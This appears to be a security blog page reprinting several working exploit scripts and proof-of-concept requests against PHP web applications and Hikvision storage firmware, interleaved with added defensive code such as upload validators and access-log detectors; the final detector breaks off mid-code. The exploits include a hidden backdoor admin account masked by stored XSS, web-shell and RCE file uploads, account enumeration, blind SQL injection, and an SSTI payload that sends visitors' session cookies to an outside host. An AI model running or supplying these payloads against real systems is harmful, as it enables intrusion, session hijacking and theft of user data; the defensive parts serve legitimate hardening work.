Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: PimpMyLog v1.7.14 - Improper access control
# Date: 2023-07-10
# Exploit Author: thoughtfault
# Vendor Homepage: https://www.pimpmylog.com/
# Software Link: https://github.com/potsky/PimpMyLog
# Version: 1.5.2-1.7.14
# Tested on: Ubuntu 22.04
# CVE : N/A
# Description: PimpMyLog suffers from improper access control on the account creation endpoint, allowing a remote attacker to create an admin account without any existing permissions. The username is not sanitized and can be leveraged as a vector for stored XSS. This allows the attacker to hide the presence of the backdoor account from legitimate admins.  Depending on the previous configuration, an attacker may be able to view sensitive information in apache, iis, nginx, and/or php logs. The attacker can view server-side environmental variables through the debug feature, which may include passwords or api keys.
import requests
import argparse
from base64 import b64encode

js = """var table = document.getElementById("userlisttable");
var rows = table.getElementsByTagName("tr");
for (var i = 0; i < rows.length; i++) {
  var cells = rows[i].getElementsByTagName("td");
  for (var j = 0; j < cells.length; j++) {
    var anchors = cells[j].getElementsByTagName("a");
    for (var k = 0; k < anchors.length; k++) {
      if (
        anchors[k].innerText === "{}" ||
        anchors[k].innerText.includes("atob(") ||
        anchors[k].querySelector("script") !== null
      ) {
        rows[i].parentNode.removeChild(rows[i]);
      }
    }
  }
}
var userCountElement = document.querySelector('.lead');
var userCountText = userCountElement.textContent;
var userCount = parseInt(userCountText);
if(!isNaN(userCount)){
        userCount--;
        userCountElement.textContent = userCount + ' Users';
}"""

payload = "<script>eval(atob('{}'));</script>"


def backdoor(url, username, password):
    config_url = url + '/inc/configure.php'

    print("[*] Creating admin account...")
    r = requests.post(config_url, data={'s':'authsave', 'u': username, 'p': password})
    if r.status_code != 200:
        print("[!] An error occurred")
        return

    print("[*] Hiding admin account...")
    base64_js = b64encode(js.format(username).encode()).decode()
    xss_payload = payload.format(base64_js)

    r = requests.post(config_url, data={'s':'authsave', 'u': xss_payload, 'p': password})
    if r.status_code != 200:
        print("[!] An error occurred")
        return


    print("[*] Exploit finished!")

parser = argparse.ArgumentParser()
parser.add_argument('--url', help='The base url of the target', required=True)
parser.add_argument('--username', default='backdoor', help='The username of the backdoor account')
parser.add_argument('--password', default='backdoor', help='The password of the backdoor account')
args = parser.parse_args()

backdoor(args.url.rstrip('/'), args.username, args.password)
            
#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
#Application: pluck
#Version: 4.7.18
#Bugs:  RCE
#Technology: PHP
#Vendor URL: https://github.com/pluck-cms/pluck
#Software Link: https://github.com/pluck-cms/pluck
#Date of found: 10-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 


import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

login_url = "http://localhost/pluck/login.php"
upload_url = "http://localhost/pluck/admin.php?action=installmodule"
headers = {"Referer": login_url,}
login_payload = {"cont1": "admin","bogus": "","submit": "Log in"}

file_path = input("ZIP file path: ")

multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)


if login_response.status_code == 200:
    print("Logged in")

 
    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

    
    if upload_response.status_code == 200:
        print("ZIP file uploaded.")
    else:
        print("ZIP file upload error. Response code:", upload_response.status_code)
else:
    print("Login problem. response code:", login_response.status_code)


rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php"

rce=requests.get(rce_url)

print(rce.text)
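The Pluck script above relies on the module installer extracting whatever the uploaded archive contains, so a ZIP carrying a .php file lands under data/modules/ and is served by the web server. The following is an added example, not code from the advisory or from the Pluck project: a server-side gate that inspects a "module" archive before extraction and refuses it when any entry is server-executable (including nested extensions such as shell.php.jpg), is a web-server configuration file, escapes the target directory, is a symlink, or pushes the uncompressed size over a cap. The 10 MiB cap and the suffix list are assumptions for the demonstration; the sample archives are constructed in memory.

```python
import io
import posixpath
import zipfile

# Suffixes a PHP-capable web server might execute, and files that reconfigure it.
EXECUTABLE_SUFFIXES = {"php", "phtml", "php3", "php4", "php5", "php7", "phar", "inc", "phps"}
CONFIG_NAMES = {".htaccess", ".user.ini"}
MAX_UNCOMPRESSED_BYTES = 10 * 1024 * 1024  # assumption: 10 MiB is plenty for a module


def inspect_module_archive(data: bytes) -> list:
    """Return the reasons an uploaded module archive must be rejected (empty list = accept)."""
    problems = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid zip archive"]

    total = 0
    with zf:
        for info in zf.infolist():
            name = info.filename
            # Normalise separators and collapse ".." so traversal cannot hide behind "a/../../".
            norm = posixpath.normpath(name.replace("\\", "/"))
            if norm.startswith("/") or norm == ".." or norm.startswith("../"):
                problems.append(f"path traversal entry: {name}")
            # The upper 16 bits of external_attr carry the Unix mode; 0o120000 is a symlink.
            if ((info.external_attr >> 16) & 0o170000) == 0o120000:
                problems.append(f"symlink entry: {name}")
            base = posixpath.basename(norm)
            if base in CONFIG_NAMES:
                problems.append(f"server configuration file: {name}")
            # Check every suffix, so "shell.php.jpg" is caught as well as "shell.php".
            if any(s.lower() in EXECUTABLE_SUFFIXES for s in base.split(".")[1:]):
                problems.append(f"server-executable file: {name}")
            total += info.file_size
    if total > MAX_UNCOMPRESSED_BYTES:
        problems.append(f"uncompressed size {total} bytes exceeds limit")
    return problems


def build_sample_zip(entries: dict) -> bytes:
    """Construct an in-memory zip from {name: content}; a test fixture, not real module data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    clean = build_sample_zip({"mymodule/module.info": b"name=demo", "mymodule/style.css": b"body{}"})
    hostile = build_sample_zip({"mirabbas/miri.php": b"<?php ?>", "../../etc/x": b"", "a.php.jpg": b""})
    print("clean archive:", inspect_module_archive(clean) or "accepted")
    print("hostile archive:", inspect_module_archive(hostile))
```

Extraction should only happen after this returns an empty list, and the destination directory should additionally have script execution disabled at the web-server level so a missed case cannot become code execution.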
            
# Exploit Title: phpfm v1.7.9 - Authentication type juggling
# Date: 2023-07-10
# Exploit Author: thoughtfault
# Vendor Homepage: https://www.dulldusk.com/phpfm/
# Software Link: https://github.com/dulldusk/phpfm/
# Version: 1.6.1-1.7.9
# Tested on: Ubuntu 22.04
# CVE : N/A
"""
An authentication bypass exists when the hash of the password selected by the user incidentally begins with 0e, 00e, and in some PHP versions, 0x. This is because loose type comparison is performed between the password hash and the loggedon value, which by default for an unauthenticated user is 0 and can additionally be controlled by the attacker. This allows an attacker to bypass the login and obtain remote code execution.

A list of vulnerable password hashes can be found here.
https://github.com/spaze/hashes/blob/master/md5.md
"""
import requests
import sys

if len(sys.argv) < 2:
    print(f"[*] Syntax: ./{__file__} http://target/")
    sys.exit(0)


url = sys.argv[1].rstrip('/') + "/index.php"

payload_name = "shell.php"
payload = '<?php echo "I am a shell"; ?>'
payload_url = url.replace("index.php", payload_name)

headers = {"Accept-Language": "en-US,en;q=0.5", "Cookie": "loggedon=0"}
files = {"dir_dest": (None, "/srv/http/"), "action": (None, "10"), "upfiles[]": ("shell.php", payload) }

requests.post(url, headers=headers, files=files)

r = requests.get(payload_url)
if r.status_code == 200:
    print(f"[*] Exploit successful: {payload_url}")
    print(r.text)
else:
    print(f"[*] Exploit might have failed, payload url returned a non-200 status code of: {r.status_code}" )
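The bypass above rests on PHP's loose comparison: when both operands are numeric strings, `==` compares them as numbers, so an MD5 digest of the form "0e" followed only by digits is numerically 0 and matches a `loggedon` value of 0 or "0". The block below is an added example, not code from the phpfm advisory or project. It models that rule in Python, provides an audit helper that flags stored digests which would collapse to zero, and shows the strict, constant-time comparison (PHP's `hash_equals()` or `===`) that closes the hole. The password 240610708 is a well-known input whose MD5 has this shape; whitespace handling, which differs between PHP versions, is deliberately left out of the model.

```python
import hashlib
import hmac
import re

# PHP's numeric-string grammar: optional sign, digits, optional fraction and exponent.
# Leading/trailing whitespace rules differ across PHP versions and are omitted here.
_NUMERIC = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_loose_equals(a: str, b: str) -> bool:
    """Model of `$a == $b` for two PHP strings: when both are numeric strings they are
    compared as numbers (PHP 5, 7 and 8 all do this), otherwise byte-wise."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def collapses_to_zero(hexdigest: str) -> bool:
    """Audit helper: True when a stored hex digest would satisfy `$hash == 0` or
    `$hash == "0"`, i.e. it is "0e" (or "00e", ...) followed only by digits."""
    return php_loose_equals(hexdigest, "0")


def vulnerable_check(stored_hash: str, loggedon_value: str) -> bool:
    """Shape of the flawed check: loose equality against a value the client controls."""
    return php_loose_equals(stored_hash, loggedon_value)


def hardened_check(stored_hash: str, supplied: str) -> bool:
    """Strict, constant-time comparison; no type coercion can make "0" match a digest."""
    return hmac.compare_digest(stored_hash.encode(), supplied.encode())


MAGIC_PASSWORD = "240610708"  # well-known input whose MD5 is "0e" followed only by digits


def audit_hashes(hexdigests):
    """Return the subset of stored digests that a loose `== 0` check would accept."""
    return [h for h in hexdigests if collapses_to_zero(h)]


if __name__ == "__main__":
    magic = hashlib.md5(MAGIC_PASSWORD.encode()).hexdigest()
    print(magic, "loosely equals '0':", vulnerable_check(magic, "0"))
    print("hardened check with '0':", hardened_check(magic, "0"))
```

`audit_hashes` is the practical takeaway for a defender: run it over the password-hash column of an application that is known to compare with `==`, and any hit is an account that can be entered with a `loggedon=0` cookie until the comparison is changed to `hash_equals()`.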
            
# Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)
# Google Dork: inurl:"index.php?option=com_booking"
# Date: 07/12/2023
# Exploit Author: qw3rTyTy
# Vendor Homepage: http://www.artio.net/
# Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download
# Version: 2.4.9
# Tested on: Slackware/Nginx/Joomla! 3.10.11
#
##
# File: site/booking.php
#
# <?php
# [...]
#18 include_once (JPATH_COMPONENT_ADMINISTRATOR . DS . 'booking.php');
# [...]
#
# File: admin/booking.php
#
# <?php
# [...]
#104 if (class_exists(($classname = AImporter::controller()))) {
#105 $controller = new $classname();
#106 /* @var $controller JController */
#107 $controller->execute(JRequest::getVar('task'));
#108 $controller->redirect();
#109 }
# [...]
#
# File: admin/controllers/customer.php
#
# <?php
# [...]
#240 function getUserData() {
#241 $user = JFactory::getUser(JRequest::getInt('id'));
#242 $data = array('name' => $user->name, 'username' => $user->username, 'email' => $user->email);
#243 die(json_encode($data));
#244 }
# [...]
#
# The following GET request is equivalent to doing a query like 'SELECT name, username, email FROM abcde_users WHERE id=123'.
#
# curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123
#
# So, an attacker can easily enumerate all accounts by bruteforcing.
#
##
import argparse
import urllib.parse
import requests
from sys import exit
from time import sleep

def enumerateAccounts(options):
    i = 1
    url = options.url
    url = url + "/index.php?option=com_booking&controller=customer&task=getUserData&id="

    while True:
        try:
            response = requests.get("{}{}".format(url, str(i)))

            if response.status_code == 200:
                try:
                    jsondocument = response.json()
                    if jsondocument["name"] != None:
                        print(jsondocument)
                except requests.exceptions.JSONDecodeError:
                    raise
            else:
                # The endpoint stopped answering with 200: assume there are no further ids.
                break
        except Exception as ex:
            print(ex)
            break

        i += 1

def main():
    p = argparse.ArgumentParser()
    p.add_argument("-u", "--url", type=str, required=True)
    parsed = p.parse_args()

    try:
        t = urllib.parse.urlparse(parsed.url)
    except ValueError as ex:
        print(ex)
        exit()

    if not t[0].startswith("http") and not t[0].startswith("https"):
        print("Improper URL given.")
        exit()

    if len(t[1]) == 0:
        print("Improper URL given.")
        exit()

    enumerateAccounts(parsed)

if __name__ == "__main__":
    main()
            
#!/bin/bash
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
# Date: July 12 2023
# Exploit Author: 1337kid
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
# Version: 1.0
# Tested on: Ubuntu
# CVE : CVE-2023-37629
#
# chmod +x exploit.sh
# ./exploit.sh web_url
# ./exploit.sh http://127.0.0.1:8080/

echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ "
echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\"
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ "
echo " @1337kid"
echo

if [[ $1 == '' ]]; then
    echo "No URL specified!"
    exit
fi

base_url=$1

unauth_file_upload() {
    # CVE-2023-37629 - File upload vuln
    echo "Generating shell.php"
    #===========
    cat > shell.php << EOF
<?php system(\$_GET['cmd']); ?>
EOF
    #===========
    echo "done"
    curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null
    req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}')
    if [[ $req == "200" ]]; then
        echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"
    else
        echo "Failed to upload a shell"
    fi
}

req=$(curl -I -s $base_url | head -1 | awk '{print $2}')
if [[ $req -eq "200" ]]; then
    unauth_file_upload
else
    echo "Error"
    echo "Status Code: $req"
fi
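The Piggery upload works because add-pig.php accepts the pigphoto field from an unauthenticated client and stores the file under its client-supplied name in a directory the web server executes PHP from. As an added example that is not code from the advisory or from the application, the following is the gate an upload handler for such a field should apply: require an authenticated session, allow-list image extensions, confirm the file's leading bytes match the declared type, reject data carrying PHP tags, and store under a random server-chosen name. The 2 MiB size cap and the marker list are assumptions; all sample inputs are constructed.

```python
import os
import secrets

# Magic bytes for the image types the photo form is supposed to accept.
IMAGE_SIGNATURES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024  # assumption: 2 MiB is enough for a photo
PHP_MARKERS = (b"<?php", b"<?=")      # crude check against image/PHP polyglots


def accept_photo(client_filename: str, content: bytes, authenticated: bool):
    """Gate for the pigphoto field. Returns (True, stored_name) or (False, reason)."""
    if not authenticated:
        return False, "unauthenticated upload rejected"
    if len(content) > MAX_UPLOAD_BYTES:
        return False, "file too large"
    # Never trust the client name: drop any directory part and keep only a lower-cased extension.
    ext = os.path.splitext(os.path.basename(client_filename))[1].lower()
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension {ext or '(none)'} not allowed"
    if not any(content.startswith(sig) for sig in IMAGE_SIGNATURES[ext]):
        return False, "content does not match the declared image type"
    if any(marker in content for marker in PHP_MARKERS):
        return False, "embedded script markers in image data"
    # Server-chosen random name; the client's filename never reaches the filesystem.
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed samples: the advisory's shell, a polyglot, and a plain JPEG header.
    samples = [
        ("shell.php", b"<?php system($_GET['cmd']); ?>", True),
        ("shell.php", b"<?php system($_GET['cmd']); ?>", False),
        ("../../shell.jpg", b"<?php echo 1; ?>", True),
        ("poly.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16 + b"<?php echo 1; ?>", True),
        ("pig.JPG", b"\xff\xd8\xff\xe0" + b"\x00" * 32, True),
    ]
    for name, data, auth in samples:
        print(name, "->", accept_photo(name, data, auth))
```

The stored name is what the application should record and serve; combined with a storage directory that has PHP execution disabled, a file that slips past the content checks is still never run.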
#Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: SSTI
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 13-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================

Steps:
1. Login to test user account
2. Go to Content Manager
3. Add New Content
4. set as
'''
{$smarty.version} {{7*7}} {$smarty.now} {$smarty.template}
<img src=YOU-SERVER/{$smarty.cookies.CMSSESSID852a6e69ca02}>
<img src=YOU-SERVER/{$smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1}>
<img src=YOU_SERVER/{$smarty.cookies.__c}>
'''
to content_en section.
5. If any user visits the page, the attacker hijacks all cookies.

payload:
%3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E

POC Request

POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=1c2c31a1c1bff4819cd&;m1_content_id=81&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 988
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMSSESSID852a6e69ca02=bq83g023otkn4s745acdnvbnu4; 34a3083b62a225efa0bc6b5b43335d226264c2c1=1e91865ac5c59e34f8dc1ddb6fd168a61246751d%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjoyLCJlZmZfdXNlcm5hbWUiOiJ0ZXN0IiwiaGFzaCI6IiQyeSQxMCRDQlwvWEIyNEpsWmhJNjhKQ29LcWplZXgyOUVXRDRGN2E1MTNIdUo2c3VXMUd1V3NKRTBNcEMifQ%3D%3D; __c=1c2c31a1c1bff4819cd
Connection: close

mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=1c2c31a1c1bff4819cd&m1_content_id=81&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E&menutext=test&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=&pagedata=&design_id=2&template_id=10&alias=test&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&ownerid=1&additional_editors=&m1_ajax=1&m1_apply=1

Poc Video: https://youtu.be/zq3u3jRpfqM

Blackcat Cms v1.4 - Stored XSS

Exploit Title: Blackcat Cms v1.4 - Stored XSS
Application: blackcat Cms
Version: v1.4
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

steps:
1. login to account
2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
3. set as <img src=x onerror=alert(4)>
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1

CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)

#Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: Remote Code Execution(RCE)
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

import requests

login_url = 'http://localhost/admin/login.php'
username = input('username = ')
password = input('password = ')
upload_url = 'http://localhost/admin/moduleinterface.php'
file_path = input("please phar file name but file must same directory with python file and file content : <?php echo system('cat /etc/passwd') ?> : ")
# phar file content: <?php echo system('cat /etc/passwd') ?>

login_data = {
    'username': username,
    'password': password,
    'loginsubmit': 'Submit'
}

session = requests.Session()
response = session.post(login_url, data=login_data)

if response.status_code == 200:
    print('Login account')
else:
    print('Login problem.')
    exit()

files = {
    'm1_files[]': open(file_path, 'rb')
}
data = {
    'mact': 'FileManager,m1_,upload,0',
    '__c': session.cookies['__c'],
    'disable_buffer': '1'
}
response = session.post(upload_url, files=files, data=data)

if response.status_code == 200:
    print('file upload')
    rce_url = f"http://localhost/uploads/{file_path}"
    rce = requests.get(rce_url)
    print(rce.text)
else:
    print('file not upload')

CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)

#Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================

steps:
1. Login to account
2. Go to Content Manager
3. Add New Content
4. Type as '<img src=x onerror=alert(document.cookie)>' to metadata section
   payload: <img src=x onerror=alert(document.cookie)>
5. Submit Content
6. Visit Content (http://localhost/index.php?page=test)

Request:

POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 584
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6
Connection: close

mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1
# Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution
# Date: 16 July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Vendor Homepage: https://www.hikvision.com
# Software Link: N/A
# Reference Link: https://cve.report/CVE-2022-28171
# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s

'''
Vendor Description:
Hikvision is a world-leading surveillance manufacturer and supplier of video surveillance and Internet of Things (IoT) equipment for civilian and military purposes. Some Hikvision Hybrid SAN products were vulnerable to multiple remote code execution vulnerabilities such as command injection, Blind SQL injection, HTTP request smuggling, and reflected cross-site scripting. This resulted in remote code execution that allows an adversary to execute arbitrary operating system commands and more. However, an adversary must be on the same network to leverage this vulnerability to execute arbitrary commands.

Vulnerability description:
A manual test confirmed that the download type parameter was vulnerable to Blind SQL injection. I created a Python script to automate and enumerate SQL versions as the application was behind the firewall and blocked all the requests from SQLmap.

Request Body:

GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close

POC:
'''
import requests
import time

url = "http://X.X.X.X:2004/web/log/dynamic_log.php"


# Function to check if the response time is at least the specified delay
def is_response_time_delayed(response_time, delay):
    return response_time >= delay


# Function to perform blind SQL injection and check the response time
def perform_blind_sql_injection(payload):
    proxies = {
        'http': 'http://localhost:8080',
        'https': 'http://localhost:8080',
    }
    params = {
        'target': 'makeMaintainLog',
        'downloadtype': payload
    }
    headers = {
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Accept-Language': 'en',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',
        'Connection': 'close'
    }
    start_time = time.time()
    response = requests.get(url, headers=headers, params=params, proxies=proxies)
    end_time = time.time()
    response_time = end_time - start_time
    return is_response_time_delayed(response_time, 20)


# Enumerate the MySQL version
def enumerate_mysql_version():
    version_Name = ''
    sleep_time = 10  # Sleep time is 10 seconds
    payloads = [
        f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid}, SLEEP({sleep_time}), 0))-- -"
        for i in range(1, 11)
        for mid in range(256)
    ]
    for payload in payloads:
        if perform_blind_sql_injection(payload):
            mid = payload.split("=")[-1].split(",")[0]
            version_Name += chr(int(mid))
    return version_Name


# Enumeration is completed
version_Name = enumerate_mysql_version()
print("MySQL version is:", version_Name)
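Three of the advisories in this batch leave a footprint in ordinary web-server access logs: the PimpMyLog account creation is a POST to /inc/configure.php, the com_booking enumeration is one client walking consecutive id= values against task=getUserData, and the Hikvision probe carries SLEEP() in a query string. The block below is an added example and not code from any of those advisories or vendors: a parser for the Apache/nginx combined log format and one detector per behaviour, run over constructed log lines. Field names, the five-request threshold for an enumeration run, and the sample IP addresses are assumptions; POST bodies are not in access logs, so the PimpMyLog detector keys on the endpoint alone.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlparse

# Apache/nginx "combined" format; only the fields the detectors need are captured.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line: str):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = COMBINED.match(line)
    if not m:
        return None
    ev = m.groupdict()
    parsed = urlparse(ev["path"])
    ev["route"] = parsed.path
    ev["raw_query"] = unquote(parsed.query)
    ev["query"] = {k: v[0] for k, v in parse_qs(parsed.query).items()}
    ev["status"] = int(ev["status"])
    return ev


def detect_pimpmylog_account_creation(events):
    """PimpMyLog: the account-creation action (s=authsave) is a POST to /inc/configure.php,
    a one-time setup endpoint, so any POST there after installation deserves an alert."""
    return [e for e in events
            if e["method"] == "POST" and e["route"].endswith("/inc/configure.php")]


def detect_id_enumeration(events, min_run: int = 5):
    """com_booking: one client requesting task=getUserData with consecutive id= values.
    Returns {ip: longest consecutive run} for clients at or above min_run."""
    ids_by_ip = defaultdict(list)
    for e in events:
        q = e["query"]
        if (q.get("option") == "com_booking" and q.get("task") == "getUserData"
                and q.get("id", "").isdigit()):
            ids_by_ip[e["ip"]].append(int(q["id"]))
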